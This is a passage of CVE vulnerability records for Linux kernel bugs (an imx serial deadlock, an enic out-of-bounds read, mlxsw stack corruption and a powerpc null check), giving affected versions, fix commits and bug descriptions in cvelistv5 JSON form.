"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nserial: imx: fix tx statemachine deadlock\n\nWhen using the serial port as RS485 port, the tx statemachine is used to\ncontrol the RTS pin to drive the RS485 transceiver TX_EN pin. When the\nTTY port is closed in the middle of a transmission (for instance during\nuserland application crash), imx_uart_shutdown disables the interface\nand disables the Transmission Complete interrupt. afer that,\nimx_uart_stop_tx bails on an incomplete transmission, to be retriggered\nby the TC interrupt. This interrupt is disabled and therefore the tx\nstatemachine never transitions out of SEND. The statemachine is in\ndeadlock now, and the TX_EN remains low, making the interface useless.\n\nimx_uart_stop_tx now checks for incomplete transmission AND whether TC\ninterrupts are enabled before bailing to be retriggered. This makes sure\nthe state machine handling is reached, and is properly set to\nWAIT_AFTER_SEND."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:36:55.750Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/6e04a9d30509fb53ba6df5d655ed61d607a7cfda"
},
{
"url": "https://git.kernel.org/stable/c/ff168d4fdb0e1ba35fb413a749b3d6cce918ec19"
},
{
"url": "https://git.kernel.org/stable/c/63ee7be01a3f7d28b1ea8b8d7944f12bb7b0ed06"
},
{
"url": "https://git.kernel.org/stable/c/763cd68746317b5d746dc2649a3295c1efb41181"
},
{
"url": "https://git.kernel.org/stable/c/9a662d06c22ddfa371958c2071dc350436be802b"
},
{
"url": "https://git.kernel.org/stable/c/78d60dae9a0c9f09aa3d6477c94047df2fe6f7b0"
}
],
"title": "serial: imx: fix tx statemachine deadlock",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52456",
"datePublished": "2024-02-23T14:46:19.139Z",
"dateReserved": "2024-02-20T12:30:33.294Z",
"dateUpdated": "2025-05-04T07:36:55.750Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38659 (GCVE-0-2024-38659)
Vulnerability from cvelistv5
Published
2024-06-21 10:28
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
enic: Validate length of nl attributes in enic_set_vf_port
enic_set_vf_port assumes that the nl attribute IFLA_PORT_PROFILE
is of length PORT_PROFILE_MAX and that the nl attributes
IFLA_PORT_INSTANCE_UUID, IFLA_PORT_HOST_UUID are of length PORT_UUID_MAX.
These attributes are validated (in the function do_setlink in rtnetlink.c)
using the nla_policy ifla_port_policy. The policy defines IFLA_PORT_PROFILE
as NLA_STRING, IFLA_PORT_INSTANCE_UUID as NLA_BINARY and
IFLA_PORT_HOST_UUID as NLA_STRING. That means that the length validation
using the policy is for the max size of the attributes and not on exact
size so the length of these attributes might be less than the sizes that
enic_set_vf_port expects. This might cause an out of bands
read access in the memcpys of the data of these
attributes in enic_set_vf_port.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: f8bd909183acffad68780b10c1cdf36161cfd5d1 Version: f8bd909183acffad68780b10c1cdf36161cfd5d1 Version: f8bd909183acffad68780b10c1cdf36161cfd5d1 Version: f8bd909183acffad68780b10c1cdf36161cfd5d1 Version: f8bd909183acffad68780b10c1cdf36161cfd5d1 Version: f8bd909183acffad68780b10c1cdf36161cfd5d1 Version: f8bd909183acffad68780b10c1cdf36161cfd5d1 Version: f8bd909183acffad68780b10c1cdf36161cfd5d1 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-38659",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-21T13:26:27.611937Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-21T13:26:37.555Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:55.964Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2b649d7e0cb42a660f0260ef25fd55fdc9c6c600"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ca63fb7af9d3e531aa25f7ae187bfc6c7166ec2d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3c0d36972edbe56fcf98899622d9b90ac9965227"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/25571a12fbc8a1283bd8380d461267956fd426f7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7077c22f84f41974a711604a42fd0e0684232ee5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f6638e955ca00c489894789492776842e102af9c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/aee1955a1509a921c05c70dad5d6fc8563dfcb31"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e8021b94b0412c37bcc79027c2e382086b6ce449"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/cisco/enic/enic_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "2b649d7e0cb42a660f0260ef25fd55fdc9c6c600",
"status": "affected",
"version": "f8bd909183acffad68780b10c1cdf36161cfd5d1",
"versionType": "git"
},
{
"lessThan": "ca63fb7af9d3e531aa25f7ae187bfc6c7166ec2d",
"status": "affected",
"version": "f8bd909183acffad68780b10c1cdf36161cfd5d1",
"versionType": "git"
},
{
"lessThan": "3c0d36972edbe56fcf98899622d9b90ac9965227",
"status": "affected",
"version": "f8bd909183acffad68780b10c1cdf36161cfd5d1",
"versionType": "git"
},
{
"lessThan": "25571a12fbc8a1283bd8380d461267956fd426f7",
"status": "affected",
"version": "f8bd909183acffad68780b10c1cdf36161cfd5d1",
"versionType": "git"
},
{
"lessThan": "7077c22f84f41974a711604a42fd0e0684232ee5",
"status": "affected",
"version": "f8bd909183acffad68780b10c1cdf36161cfd5d1",
"versionType": "git"
},
{
"lessThan": "f6638e955ca00c489894789492776842e102af9c",
"status": "affected",
"version": "f8bd909183acffad68780b10c1cdf36161cfd5d1",
"versionType": "git"
},
{
"lessThan": "aee1955a1509a921c05c70dad5d6fc8563dfcb31",
"status": "affected",
"version": "f8bd909183acffad68780b10c1cdf36161cfd5d1",
"versionType": "git"
},
{
"lessThan": "e8021b94b0412c37bcc79027c2e382086b6ce449",
"status": "affected",
"version": "f8bd909183acffad68780b10c1cdf36161cfd5d1",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/cisco/enic/enic_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.35"
},
{
"lessThan": "2.6.35",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.4",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "2.6.35",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nenic: Validate length of nl attributes in enic_set_vf_port\n\nenic_set_vf_port assumes that the nl attribute IFLA_PORT_PROFILE\nis of length PORT_PROFILE_MAX and that the nl attributes\nIFLA_PORT_INSTANCE_UUID, IFLA_PORT_HOST_UUID are of length PORT_UUID_MAX.\nThese attributes are validated (in the function do_setlink in rtnetlink.c)\nusing the nla_policy ifla_port_policy. The policy defines IFLA_PORT_PROFILE\nas NLA_STRING, IFLA_PORT_INSTANCE_UUID as NLA_BINARY and\nIFLA_PORT_HOST_UUID as NLA_STRING. That means that the length validation\nusing the policy is for the max size of the attributes and not on exact\nsize so the length of these attributes might be less than the sizes that\nenic_set_vf_port expects. This might cause an out of bands\nread access in the memcpys of the data of these\nattributes in enic_set_vf_port."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:15:56.715Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/2b649d7e0cb42a660f0260ef25fd55fdc9c6c600"
},
{
"url": "https://git.kernel.org/stable/c/ca63fb7af9d3e531aa25f7ae187bfc6c7166ec2d"
},
{
"url": "https://git.kernel.org/stable/c/3c0d36972edbe56fcf98899622d9b90ac9965227"
},
{
"url": "https://git.kernel.org/stable/c/25571a12fbc8a1283bd8380d461267956fd426f7"
},
{
"url": "https://git.kernel.org/stable/c/7077c22f84f41974a711604a42fd0e0684232ee5"
},
{
"url": "https://git.kernel.org/stable/c/f6638e955ca00c489894789492776842e102af9c"
},
{
"url": "https://git.kernel.org/stable/c/aee1955a1509a921c05c70dad5d6fc8563dfcb31"
},
{
"url": "https://git.kernel.org/stable/c/e8021b94b0412c37bcc79027c2e382086b6ce449"
}
],
"title": "enic: Validate length of nl attributes in enic_set_vf_port",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38659",
"datePublished": "2024-06-21T10:28:15.337Z",
"dateReserved": "2024-06-21T10:12:11.472Z",
"dateUpdated": "2025-11-04T17:21:55.964Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26586 (GCVE-0-2024-26586)
Vulnerability from cvelistv5
Published
2024-02-22 16:13
Modified
2025-05-04 08:51
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
mlxsw: spectrum_acl_tcam: Fix stack corruption
When tc filters are first added to a net device, the corresponding local
port gets bound to an ACL group in the device. The group contains a list
of ACLs. In turn, each ACL points to a different TCAM region where the
filters are stored. During forwarding, the ACLs are sequentially
evaluated until a match is found.
One reason to place filters in different regions is when they are added
with decreasing priorities and in an alternating order so that two
consecutive filters can never fit in the same region because of their
key usage.
In Spectrum-2 and newer ASICs the firmware started to report that the
maximum number of ACLs in a group is more than 16, but the layout of the
register that configures ACL groups (PAGT) was not updated to account
for that. It is therefore possible to hit stack corruption [1] in the
rare case where more than 16 ACLs in a group are required.
Fix by limiting the maximum ACL group size to the minimum between what
the firmware reports and the maximum ACLs that fit in the PAGT register.
Add a test case to make sure the machine does not crash when this
condition is hit.
[1]
Kernel panic - not syncing: stack-protector: Kernel stack is corrupted in: mlxsw_sp_acl_tcam_group_update+0x116/0x120
[...]
dump_stack_lvl+0x36/0x50
panic+0x305/0x330
__stack_chk_fail+0x15/0x20
mlxsw_sp_acl_tcam_group_update+0x116/0x120
mlxsw_sp_acl_tcam_group_region_attach+0x69/0x110
mlxsw_sp_acl_tcam_vchunk_get+0x492/0xa20
mlxsw_sp_acl_tcam_ventry_add+0x25/0xe0
mlxsw_sp_acl_rule_add+0x47/0x240
mlxsw_sp_flower_replace+0x1a9/0x1d0
tc_setup_cb_add+0xdc/0x1c0
fl_hw_replace_filter+0x146/0x1f0
fl_change+0xc17/0x1360
tc_new_tfilter+0x472/0xb90
rtnetlink_rcv_msg+0x313/0x3b0
netlink_rcv_skb+0x58/0x100
netlink_unicast+0x244/0x390
netlink_sendmsg+0x1e4/0x440
____sys_sendmsg+0x164/0x260
___sys_sendmsg+0x9a/0xe0
__sys_sendmsg+0x7a/0xc0
do_syscall_64+0x40/0xe0
entry_SYSCALL_64_after_hwframe+0x63/0x6b
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: c3ab435466d5109b2c7525a3b90107d4d9e918fc Version: c3ab435466d5109b2c7525a3b90107d4d9e918fc Version: c3ab435466d5109b2c7525a3b90107d4d9e918fc Version: c3ab435466d5109b2c7525a3b90107d4d9e918fc Version: c3ab435466d5109b2c7525a3b90107d4d9e918fc Version: c3ab435466d5109b2c7525a3b90107d4d9e918fc |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26586",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-22T20:41:19.395721Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:02.147Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:07:19.636Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/56750ea5d15426b5f307554e7699e8b5f76c3182"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/348112522a35527c5bcba933b9fefb40a4f44f15"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6fd24675188d354b1cad47462969afa2ab09d819"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2f5e1565740490706332c06f36211d4ce0f88e62"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a361c2c1da5dbb13ca67601cf961ab3ad68af383"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/483ae90d8f976f8339cf81066312e1329f2d3706"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c",
"tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "56750ea5d15426b5f307554e7699e8b5f76c3182",
"status": "affected",
"version": "c3ab435466d5109b2c7525a3b90107d4d9e918fc",
"versionType": "git"
},
{
"lessThan": "348112522a35527c5bcba933b9fefb40a4f44f15",
"status": "affected",
"version": "c3ab435466d5109b2c7525a3b90107d4d9e918fc",
"versionType": "git"
},
{
"lessThan": "6fd24675188d354b1cad47462969afa2ab09d819",
"status": "affected",
"version": "c3ab435466d5109b2c7525a3b90107d4d9e918fc",
"versionType": "git"
},
{
"lessThan": "2f5e1565740490706332c06f36211d4ce0f88e62",
"status": "affected",
"version": "c3ab435466d5109b2c7525a3b90107d4d9e918fc",
"versionType": "git"
},
{
"lessThan": "a361c2c1da5dbb13ca67601cf961ab3ad68af383",
"status": "affected",
"version": "c3ab435466d5109b2c7525a3b90107d4d9e918fc",
"versionType": "git"
},
{
"lessThan": "483ae90d8f976f8339cf81066312e1329f2d3706",
"status": "affected",
"version": "c3ab435466d5109b2c7525a3b90107d4d9e918fc",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c",
"tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.19"
},
{
"lessThan": "4.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_acl_tcam: Fix stack corruption\n\nWhen tc filters are first added to a net device, the corresponding local\nport gets bound to an ACL group in the device. The group contains a list\nof ACLs. In turn, each ACL points to a different TCAM region where the\nfilters are stored. During forwarding, the ACLs are sequentially\nevaluated until a match is found.\n\nOne reason to place filters in different regions is when they are added\nwith decreasing priorities and in an alternating order so that two\nconsecutive filters can never fit in the same region because of their\nkey usage.\n\nIn Spectrum-2 and newer ASICs the firmware started to report that the\nmaximum number of ACLs in a group is more than 16, but the layout of the\nregister that configures ACL groups (PAGT) was not updated to account\nfor that. It is therefore possible to hit stack corruption [1] in the\nrare case where more than 16 ACLs in a group are required.\n\nFix by limiting the maximum ACL group size to the minimum between what\nthe firmware reports and the maximum ACLs that fit in the PAGT register.\n\nAdd a test case to make sure the machine does not crash when this\ncondition is hit.\n\n[1]\nKernel panic - not syncing: stack-protector: Kernel stack is corrupted in: mlxsw_sp_acl_tcam_group_update+0x116/0x120\n[...]\n dump_stack_lvl+0x36/0x50\n panic+0x305/0x330\n __stack_chk_fail+0x15/0x20\n mlxsw_sp_acl_tcam_group_update+0x116/0x120\n mlxsw_sp_acl_tcam_group_region_attach+0x69/0x110\n mlxsw_sp_acl_tcam_vchunk_get+0x492/0xa20\n mlxsw_sp_acl_tcam_ventry_add+0x25/0xe0\n mlxsw_sp_acl_rule_add+0x47/0x240\n mlxsw_sp_flower_replace+0x1a9/0x1d0\n tc_setup_cb_add+0xdc/0x1c0\n fl_hw_replace_filter+0x146/0x1f0\n fl_change+0xc17/0x1360\n tc_new_tfilter+0x472/0xb90\n rtnetlink_rcv_msg+0x313/0x3b0\n netlink_rcv_skb+0x58/0x100\n netlink_unicast+0x244/0x390\n netlink_sendmsg+0x1e4/0x440\n ____sys_sendmsg+0x164/0x260\n ___sys_sendmsg+0x9a/0xe0\n __sys_sendmsg+0x7a/0xc0\n do_syscall_64+0x40/0xe0\n entry_SYSCALL_64_after_hwframe+0x63/0x6b"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:51:38.543Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/56750ea5d15426b5f307554e7699e8b5f76c3182"
},
{
"url": "https://git.kernel.org/stable/c/348112522a35527c5bcba933b9fefb40a4f44f15"
},
{
"url": "https://git.kernel.org/stable/c/6fd24675188d354b1cad47462969afa2ab09d819"
},
{
"url": "https://git.kernel.org/stable/c/2f5e1565740490706332c06f36211d4ce0f88e62"
},
{
"url": "https://git.kernel.org/stable/c/a361c2c1da5dbb13ca67601cf961ab3ad68af383"
},
{
"url": "https://git.kernel.org/stable/c/483ae90d8f976f8339cf81066312e1329f2d3706"
}
],
"title": "mlxsw: spectrum_acl_tcam: Fix stack corruption",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26586",
"datePublished": "2024-02-22T16:13:31.796Z",
"dateReserved": "2024-02-19T14:20:24.125Z",
"dateUpdated": "2025-05-04T08:51:38.543Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52690 (GCVE-0-2023-52690)
Vulnerability from cvelistv5
Published
2024-05-17 14:24
Modified
2025-05-04 07:41
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
powerpc/powernv: Add a null pointer check to scom_debug_init_one()
kasprintf() returns a pointer to dynamically allocated memory
which can be NULL upon failure.
Add a null pointer check, and release 'ent' to avoid memory leaks.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: bfd2f0d49aef8abfe6bf58f12719f39912993cc6 Version: bfd2f0d49aef8abfe6bf58f12719f39912993cc6 Version: bfd2f0d49aef8abfe6bf58f12719f39912993cc6 Version: bfd2f0d49aef8abfe6bf58f12719f39912993cc6 Version: bfd2f0d49aef8abfe6bf58f12719f39912993cc6 Version: bfd2f0d49aef8abfe6bf58f12719f39912993cc6 Version: bfd2f0d49aef8abfe6bf58f12719f39912993cc6 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52690",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-23T19:27:29.036403Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:24:12.350Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:11:35.451Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f84c1446daa552e9699da8d1f8375eac0f65edc7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1eefa93faf69188540b08b024794fa90b1d82e8b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2a82c4439b903639e0a1f21990cd399fb0a49c19"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ed8d023cfa97b559db58c0e1afdd2eec7a83d8f2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dd8422ff271c22058560832fc3006324ded895a9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a9c05cbb6644a2103c75b6906e9dafb9981ebd13"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9a260f2dd827bbc82cc60eb4f4d8c22707d80742"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/powerpc/platforms/powernv/opal-xscom.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f84c1446daa552e9699da8d1f8375eac0f65edc7",
"status": "affected",
"version": "bfd2f0d49aef8abfe6bf58f12719f39912993cc6",
"versionType": "git"
},
{
"lessThan": "1eefa93faf69188540b08b024794fa90b1d82e8b",
"status": "affected",
"version": "bfd2f0d49aef8abfe6bf58f12719f39912993cc6",
"versionType": "git"
},
{
"lessThan": "2a82c4439b903639e0a1f21990cd399fb0a49c19",
"status": "affected",
"version": "bfd2f0d49aef8abfe6bf58f12719f39912993cc6",
"versionType": "git"
},
{
"lessThan": "ed8d023cfa97b559db58c0e1afdd2eec7a83d8f2",
"status": "affected",
"version": "bfd2f0d49aef8abfe6bf58f12719f39912993cc6",
"versionType": "git"
},
{
"lessThan": "dd8422ff271c22058560832fc3006324ded895a9",
